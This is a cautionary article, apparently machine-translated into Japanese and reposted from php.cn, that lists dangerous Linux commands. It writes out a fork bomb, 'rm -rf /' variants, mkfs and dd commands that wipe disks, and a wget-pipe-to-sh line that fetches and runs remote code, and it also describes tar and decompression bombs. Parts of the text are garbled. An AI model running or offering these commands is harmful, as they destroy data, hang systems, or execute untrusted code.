常に注意しなければならない 9 つの PHP コマンドとコード

伊谢尔伦
リリース: 2016-11-24 14:31:48
オリジナル
1184 人が閲覧しました

Linux シェル/ターミナル コマンドは非常に強力で、単純なコマンドでもフォルダー、ファイル、またはパス フォルダーが削除される可能性があります。

場合によっては、Linux が何も要求せずにコマンドを直接実行し、さまざまなデータ情報が失われることがあります。

一般に、新しい Linux ユーザーは Web 上でこれらのコマンドを実行することをお勧めします。もちろん、このコードを書いた人の中には、そう思わない人もいます。なぜなら、一度書き留めてしまえば、これはもはや冗談ではないからです。 。

ここでは、システムに有害な Linux コードをいくつか集めて、それらを回避できるようにしました。覚えておいてください: このコードは非常に危険であり、さらに有害になるように変更される可能性もあります。

他に注意すべき点: 一部のコマンドは、Ubuntu で sudo プレフィックスが付いている場合にのみ有害です。 Linux の他のディストリビューションは、ルート ディレクトリ コマンドとして使用すると有害になります。

1. Linux Fork Bomb コマンド

:(){ :|: & };: Fork Bomb として知られる、Linux システムに対するサービス拒否攻撃です。 :(){ :|: & };: は bash 関数です。実行される限り、システムがフリーズするまで繰り返されます。

この問題を解決するには、システムを再起動する必要があります。したがって、Linux インターフェイスでこのコマンドを実行するときは、必ず注意してください。

2. Mv Folder/Dev/Null コマンド

mv Folder/dev/null も危険なコマンドです。 Dev/null または null デバイスは、このデバイス ファイルに書き込まれたすべてのデータを削除するデバイス ファイルです。ただし、操作プロンプトでは、書き込み操作が正常に実行されたことが示されます。これは、私たちがよくビットバックまたはブラック ホールと呼ぶものです。

3. Rm -Rf コマンド

rm -rf コマンドは、Linux システムのフォルダーとその内容をすばやく削除できます。正しい使い方を知らないと、ただ泣くだけです。

m-rf コマンドの最も一般的な組み合わせと選択肢をリストします:

rm command :删除Linux系统的文件
rm -f command:不需提示,删除文件中的只读文件
rm -r command 循环删除文件夹的内容
rm -d command :删除空目录,如果非空目录则不会执行该操作
rm -rf/ command:强制删除根目录中的所有内容和子文件夹(包括写保护文件)命令。
rm -rf* command :强制删除当前目录中的所有内容(当前工作目录)和字文件夹
rm -rf. command:强制删除当前文件夹目录/子目录中的所有内容 。同rm -r.[^.]*
The rm -r.[^.]* command :删除文件及文件夹,带有删除提示
ログイン後にコピー

4. Mkfs コマンド

mkfs の機能を知らない場合、それは mkfs の後に書かれたコマンドでもあります。空の Linux ファイル システムをフォーマットして置き換えます。

以下は、ハードディスクをフォーマットするために管理者権限が必要なコマンドです:

mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos mkfs.reiserfs
mkfs.vfat
ログイン後にコピー

mkfs.cramfs も上記のコードと同じことを実行できますが、管理者ソース権限は必要ありません。

5. Tar Bomb

tar コマンドは、複数のファイルを .tar 形式で 1 ​​つのファイル (アーカイブ ファイル) にまとめるために使用されます。テープ アーカイブ (タール) 爆弾は彼によって作成できます。

圧縮すると、このアーカイブ ファイルによって、新しいディレクトリではなく現在のディレクトリに表示される、同じ名前のファイルが何万も生成されます。

tar ファイルを受信するときは、定期的に新しい保護されたディレクトリを作成し、受信した tar ファイルを解凍する前にこのディレクトリに配置すると、tar 爆弾の被害者になることを避けることができます。

6. Dd コマンド

Dd コマンドは、ハードディスクのパーティションをコピーおよび変更するために使用されます。間違った場所で使用すると危険です。

dd コマンドは以下にリストされています:

dd if=/dev/hda of=/dev/hdb
dd if=/dev/hda of=/dev/sdb
dd if=something of=/dev/hda
dd if=something of=/dev/sda
ログイン後にコピー

次のコマンドはメイン ハードディスク全体をクリアします: dd if=/dev/zero of=/dev/had

7 場合によっては、トラップはシェル スクリプト ファイルを提供し、それをダウンロードして実行するように求めます。スクリプトには悪意のあるコードまたは危険なコードが含まれている可能性があります。コマンド形式は次のようになります: wget http://some_malicious_source -O- | wget は sh ナロースクリプトを実行するときにスクリプトをダウンロードします。

8. 悪意のあるソースコード

おそらく誰かがソースコードを渡してコンパイルさせてくれるでしょう。コードは通常のコードである可能性がありますが、大規模なソース コードの中に悪意のあるコードが隠されている可能性があります。その場合、システムは脆弱です。それを回避するにはどうすればよいでしょうか? 信頼できるソースからのソース コードのみを受け入れてコンパイルします。

9. 解凍爆弾

圧縮ファイルを受け取り、おそらく KB ほどの小さなファイルを解凍するように求められました。実際、圧縮ファイルの小さいサイズには、高度に圧縮されたデータが含まれています。

ファイルが解凍される限り、数百 GB のデータが抽出されます。この時点で、大きすぎるデータがハードドライブをいっぱいにし、ダウンタイムが発生する可能性があります。これを回避するにはどうすればよいでしょうか。古いことわざにあるように、安っぽくなく、どんな文書でも受け入れてください。信頼できる情報源からの文書を受け入れてください。

関連ラベル:
ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
最新の問題
人気のチュートリアル
詳細>
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート